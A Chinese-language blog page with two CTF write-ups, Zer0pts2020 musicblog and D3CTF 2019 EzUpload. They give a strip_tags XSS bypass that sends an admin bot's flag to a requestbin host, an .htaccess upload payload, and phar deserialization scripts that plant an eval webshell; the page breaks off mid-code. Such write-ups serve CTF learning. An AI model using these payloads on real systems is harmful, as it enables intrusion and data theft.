<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-corner-indicator.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="[Zer0pts2020]musicblog">
<meta property="og:type" content="article">
<meta property="og:title" content="remaining">
<meta property="og:url" content="http://yoursite.com/2020/08/06/remaining/index.html">
<meta property="og:site_name" content="be a J0K1R">
<meta property="og:description" content="[Zer0pts2020]musicblog">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/1.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/2.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/3.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/4.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/5.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/6.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/7.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/8.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/9.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/10.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/11.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/12.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/13.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/14.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/15.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/16.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/17.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/18.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/19.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/20.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/21.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/22.png">
<meta property="og:image" content="http://yoursite.com/2020/08/06/remaining/23.png">
<meta property="article:published_time" content="2020-08-06T04:48:04.000Z">
<meta property="article:modified_time" content="2020-08-10T04:34:14.000Z">
<meta property="article:author" content="Peguin">
<meta property="article:tag" content="buu">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/08/06/remaining/1.png">

<link rel="canonical" href="http://yoursite.com/2020/08/06/remaining/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>remaining | be a J0K1R</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="be a J0K1R" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">be a J0K1R</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/08/06/remaining/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="Peguin">
      <meta itemprop="description" content="敢于去想，才会有MEteor的光芒闪耀。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="be a J0K1R">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          remaining
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-08-06 12:48:04" itemprop="dateCreated datePublished" datetime="2020-08-06T12:48:04+08:00">2020-08-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-08-10 12:34:14" itemprop="dateModified" datetime="2020-08-10T12:34:14+08:00">2020-08-10</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Zer0pts2020-musicblog"><a href="#Zer0pts2020-musicblog" class="headerlink" title="[Zer0pts2020]musicblog"></a>[Zer0pts2020]musicblog<a id="more"></a></h2><h2 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h2><ul>
<li>CSP限制</li>
<li>strip_tags漏洞利用</li>
</ul>
<h2 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h2><p>源码里的worker.js中</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> crawl = <span class="keyword">async</span> (url) =&gt; &#123;</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">`[+] Query! (<span class="subst">$&#123;url&#125;</span>)`</span>);</span><br><span class="line">    <span class="keyword">const</span> page = <span class="keyword">await</span> browser.newPage();</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">await</span> page.setUserAgent(flag);</span><br><span class="line">        <span class="keyword">await</span> page.goto(url, &#123;</span><br><span class="line">            waitUntil: <span class="string">'networkidle0'</span>,</span><br><span class="line">            timeout: <span class="number">3</span> * <span class="number">1000</span>,</span><br><span class="line">        &#125;);</span><br><span class="line">        page.click(<span class="string">'#like'</span>);</span><br><span class="line">        <span class="keyword">await</span> page.waitForNavigation(&#123;<span class="attr">timeout</span>: <span class="number">3000</span>&#125;);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (err)&#123;</span><br><span class="line">        <span class="built_in">console</span>.log(err);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">await</span> page.close();</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">`[+] Done! (<span class="subst">$&#123;url&#125;</span>)`</span>)</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>可以看到flag在UA字段中，admin会自动点击like标签</p>
<p>在util.php中，对能用的标签做了限制，只能用<code>&lt;audio&gt;</code>,查找strip_tags，当strip_tags与白名单标签一起使用时，php允许在白名单标签名称内出现斜杠（“ /”），并将其复制到结果中。(<a href="https://bugs.php.net/bug.php?id=78814" target="_blank" rel="noopener">https://bugs.php.net/bug.php?id=78814</a>)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">render_tags</span><span class="params">($str)</span> </span>&#123;</span><br><span class="line">  $str = preg_replace(<span class="string">'/\[\[(.+?)\]\]/'</span>, <span class="string">'&lt;audio controls src="\\1"&gt;&lt;/audio&gt;'</span>, $str);</span><br><span class="line">  $str = strip_tags($str, <span class="string">'&lt;audio&gt;'</span>); <span class="comment">// only allows `&lt;audio&gt;`</span></span><br><span class="line">  <span class="keyword">return</span> $str;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>所以在<code>&lt;a/udio&gt;</code>可以使用a标签</p>
<p>又存在CSP，不能跨域请求，可以用a标签进行请求</p>
<img src="/2020/08/06/remaining/1.png" class="">

<p>可以看到content是可控的，且用到了render_tags方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a&#x2F;udio id&#x3D;like href&#x3D;http:&#x2F;&#x2F;http.requestbin.buuoj.cn&#x2F;1b38hj71&gt;aa</span><br><span class="line">浏览器解析后就成了</span><br><span class="line">&lt;a udio id&#x3D;like href&#x3D;http:&#x2F;&#x2F;http.requestbin.buuoj.cn&#x2F;1b38hj71&gt;aa</span><br></pre></td></tr></table></figure>

<p>这样flag就会被带出了</p>
<img src="/2020/08/06/remaining/2.png" class="">

<h2 id="D3CTF-2019-EzUpload-环境问题未打通，一个早上没整出来"><a href="#D3CTF-2019-EzUpload-环境问题未打通，一个早上没整出来" class="headerlink" title="[D3CTF 2019]EzUpload(环境问题未打通，一个早上没整出来)"></a>[D3CTF 2019]EzUpload(环境问题未打通，一个早上没整出来)</h2><h2 id="知识点-1"><a href="#知识点-1" class="headerlink" title="知识点"></a>知识点</h2><ul>
<li>phar协议</li>
<li>序列化</li>
<li>.htaccess新形式</li>
<li>代码审计</li>
</ul>
<h2 id="解题步骤-1"><a href="#解题步骤-1" class="headerlink" title="解题步骤"></a>解题步骤</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">dir</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $userdir;</span><br><span class="line">    <span class="keyword">public</span> $url;</span><br><span class="line">    <span class="keyword">public</span> $filename;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($url,$filename)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;userdir = <span class="string">"upload/"</span> . md5($_SERVER[<span class="string">"REMOTE_ADDR"</span>]);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;url = $url;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;filename  =  $filename;</span><br><span class="line">        <span class="keyword">if</span> (!file_exists(<span class="keyword">$this</span>-&gt;userdir)) &#123;</span><br><span class="line">            mkdir(<span class="keyword">$this</span>-&gt;userdir, <span class="number">0777</span>, <span class="keyword">true</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkdir</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;userdir != <span class="string">"upload/"</span> . md5($_SERVER[<span class="string">"REMOTE_ADDR"</span>])) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'hacker!!!'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkurl</span><span class="params">()</span></span>&#123;</span><br><span class="line">        $r = parse_url(<span class="keyword">$this</span>-&gt;url);</span><br><span class="line">        <span class="keyword">if</span> (!<span class="keyword">isset</span>($r[<span class="string">'scheme'</span>]) || preg_match(<span class="string">"/file|php/i"</span>,$r[<span class="string">'scheme'</span>]))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'hacker!!!'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkext</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (stristr(<span class="keyword">$this</span>-&gt;filename,<span class="string">'..'</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'hacker!!!'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (stristr(<span class="keyword">$this</span>-&gt;filename,<span class="string">'/'</span>))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'hacker!!!'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        $ext = substr(<span class="keyword">$this</span>-&gt;filename, strrpos(<span class="keyword">$this</span>-&gt;filename, <span class="string">"."</span>) + <span class="number">1</span>);</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">"/ph/i"</span>, $ext))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'hacker!!!'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;checkdir();</span><br><span class="line">        <span class="keyword">$this</span>-&gt;checkurl();</span><br><span class="line">        <span class="keyword">$this</span>-&gt;checkext();</span><br><span class="line">        $content = file_get_contents(<span class="keyword">$this</span>-&gt;url,<span class="keyword">NULL</span>,<span class="keyword">NULL</span>,<span class="number">0</span>,<span class="number">2048</span>);</span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">"/\&lt;\?|value|on|type|flag|auto|set|\\\\/i"</span>, $content))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'hacker!!!'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        file_put_contents(<span class="keyword">$this</span>-&gt;userdir.<span class="string">"/"</span>.<span class="keyword">$this</span>-&gt;filename,$content);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">remove</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;checkdir();</span><br><span class="line">        <span class="keyword">$this</span>-&gt;checkext();</span><br><span class="line">        <span class="keyword">if</span> (file_exists(<span class="keyword">$this</span>-&gt;userdir.<span class="string">"/"</span>.<span class="keyword">$this</span>-&gt;filename))&#123;</span><br><span class="line">            unlink(<span class="keyword">$this</span>-&gt;userdir.<span class="string">"/"</span>.<span class="keyword">$this</span>-&gt;filename);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">count</span><span class="params">($dir)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> ($dir === <span class="string">''</span>)&#123;</span><br><span class="line">            $num = count(scandir(<span class="keyword">$this</span>-&gt;userdir)) - <span class="number">2</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            $num = count(scandir($dir)) - <span class="number">2</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>($num &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">"you have $num files"</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">"you don't have file"</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> implode(<span class="string">" "</span>,scandir(<span class="keyword">__DIR__</span>.<span class="string">"/"</span>.<span class="keyword">$this</span>-&gt;userdir));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        $string = <span class="string">"your file in : "</span>.<span class="keyword">$this</span>-&gt;userdir;</span><br><span class="line">        file_put_contents(<span class="keyword">$this</span>-&gt;filename.<span class="string">".txt"</span>, $string);</span><br><span class="line">        <span class="keyword">echo</span> $string;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'action'</span>]) || !<span class="keyword">isset</span>($_POST[<span class="string">'url'</span>]) || !<span class="keyword">isset</span>($_POST[<span class="string">'filename'</span>]))&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">die</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$dir = <span class="keyword">new</span> dir($_POST[<span class="string">'url'</span>],$_POST[<span class="string">'filename'</span>]);</span><br><span class="line"><span class="keyword">if</span>($_POST[<span class="string">'action'</span>] === <span class="string">"upload"</span>) &#123;</span><br><span class="line">    $dir-&gt;upload();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">elseif</span> ($_POST[<span class="string">'action'</span>] === <span class="string">"remove"</span>) &#123;</span><br><span class="line">    $dir-&gt;remove();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">elseif</span> ($_POST[<span class="string">'action'</span>] === <span class="string">"count"</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'dir'</span>]))&#123;</span><br><span class="line">        <span class="keyword">echo</span> $dir-&gt;count(<span class="string">''</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> $dir-&gt;count($_POST[<span class="string">'dir'</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>经过check后文件写入。文件内容从传入的url读取，一般情况下是允许读取远程文件的，因此可以在vps上设置文件。</p>
<p><code>checkdir()</code>检查了<code>$this-&gt;userdir</code>，先放着</p>
<p><code>checkurl()</code>禁止了url出现<code>php|file</code>，防止使用两种伪协议读取本地文件，除了vps上设置文件还可以使用<code>data://</code>协议</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">checkext()&#96;禁止了&#96;filename&#96;出现&#96;..&#96;、&#96;&#x2F;&#96;、&#96;ph&#96;，可以想到&#96;.htaccess</span><br></pre></td></tr></table></figure>

<p>一般的.htaccess格式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;1.jpg&quot;&gt;</span><br><span class="line"> SetHandler application&#x2F;x-httpd-php</span><br><span class="line">&lt;&#x2F;FilesMatch&gt;</span><br></pre></td></tr></table></figure>

<p>或者是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-php .txt</span><br></pre></td></tr></table></figure>

<p>这里还有另一种</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddHandler php7-script .txt</span><br></pre></td></tr></table></figure>

<p>写入的.htaccess</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">action&#x3D;upload&amp;url&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0&amp;filename&#x3D;.htaccess</span><br></pre></td></tr></table></figure>

<p>这里要获取<code>upload/</code>目录的绝对路径，可以通过<code>__destruct()</code>中的 <code>echo $string;</code> 触发<code>__toString()</code>，打印<code>__DIR__</code>，phar可以进行gzip压缩，从而绕过对一些字符的检查</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">dir</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $userdir;</span><br><span class="line">    <span class="keyword">public</span> $url;</span><br><span class="line">    <span class="keyword">public</span> $filename;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$d = <span class="keyword">new</span> dir();</span><br><span class="line">$d-&gt;userdir = <span class="keyword">new</span> dir();</span><br><span class="line">$d-&gt;userdir-&gt;userdir = <span class="string">"../"</span>;</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize($d));</span><br><span class="line">$phar = <span class="keyword">new</span> Phar(<span class="string">"somnus2.phar"</span>);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;setStub(<span class="string">"GIF89A"</span>.<span class="string">"__HALT_COMPILER();"</span>); <span class="comment">//设置stub，增加gif文件头用以欺骗检测</span></span><br><span class="line">$phar-&gt;setMetadata($d); <span class="comment">//将自定义meta-data存入manifest</span></span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.jpg"</span>, <span class="string">"test"</span>); <span class="comment">//添加要压缩的文件</span></span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>进行gzip压缩，再放到内网靶机的web服务下</p>
<p>先上传</p>
<img src="/2020/08/06/remaining/3.png" class="">

<p>再用phar触发反序列化</p>
<img src="/2020/08/06/remaining/4.png" class="">

<p>同样的，接下来再绝对路径中写入shell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="class"><span class="keyword">class</span> <span class="title">dir</span></span>&#123;</span><br><span class="line">      <span class="keyword">public</span> $userdir;</span><br><span class="line">      <span class="keyword">public</span> $filename;</span><br><span class="line">      <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;filename = <span class="string">'/var/www/html/45f6a4a57549a572/upload/adeee0c170ad4ffb110df0cde294aecd/shell'</span>;<span class="comment">//这里不需要加后缀</span></span><br><span class="line">        <span class="keyword">$this</span>-&gt;userdir = <span class="string">'aaaaaaaaaaa&lt;?php phpinfo();eval($_POST[cmd]);?&gt;aaaaaaa'</span>;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $a = <span class="keyword">new</span> dir();</span><br><span class="line">    <span class="comment">// var_dump($a);</span></span><br><span class="line">    @unlink(<span class="string">"phar.phar"</span>);</span><br><span class="line">    $phar = <span class="keyword">new</span> Phar(<span class="string">"phar.phar"</span>); <span class="comment">//后缀名必须为phar</span></span><br><span class="line">    $phar-&gt;startBuffering();</span><br><span class="line">    $phar-&gt;setStub(<span class="string">"&lt;?php __HALT_COMPILER(); ?&gt;"</span>); <span class="comment">//设置stub</span></span><br><span class="line">    $phar-&gt;setMetadata($a); <span class="comment">//将自定义的meta-data存入manifest</span></span><br><span class="line">    $phar-&gt;addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">//添加要压缩的文件</span></span><br><span class="line">    <span class="comment">//签名自动计算</span></span><br><span class="line">    $phar-&gt;stopBuffering();</span><br><span class="line"><span 